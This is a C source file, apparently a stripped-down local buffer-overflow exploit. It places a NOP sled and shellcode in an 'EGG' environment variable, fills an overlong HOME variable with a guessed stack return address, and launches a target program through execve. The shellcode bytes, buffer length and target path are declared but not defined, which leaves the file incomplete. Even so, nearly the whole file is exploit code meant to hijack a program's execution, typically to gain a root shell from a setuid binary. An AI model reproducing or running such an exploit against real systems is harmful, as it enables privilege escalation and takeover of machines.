
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int evilbuf ;


 int BUFLEN ;
 char* PATH ;
 int bzero (char*,int) ;
 int execve (char*,char**,char**) ;
 scalar_t__ malloc (int) ;
 int memset (char*,int,int) ;
 char* shellcode ;
 int sprintf (char*,char*,...) ;
 int strcpy (char*,char*) ;
 int strlen (char*) ;

int main(int argc, char *argv[]) {

        char evilbuf[BUFLEN];
        int i;
        char *p,*av[2], *ev[3];
        char *egg;

        egg=(char *)malloc(1000);
        sprintf(egg, "EGG=");
        memset(egg + 4, 0x90, 1000-1-strlen(shellcode));
        sprintf(egg + 4 + 1000-1-strlen(shellcode), "%s", shellcode);

 long ret=0xbfffffff-5-strlen(egg)-strlen(PATH);

        p=evilbuf;
        bzero(evilbuf,sizeof(evilbuf));
 strcpy(evilbuf,"HOME=");

        for(i=5;i<=BUFLEN;i+=4)
     *(long *)(p+i)=ret;

        av[0] = PATH;
        av[1] = 0;
        ev[0] = egg;
 ev[1] = evilbuf;
        ev[2] = 0;
        execve(*av, av, ev);

        return 0;

}
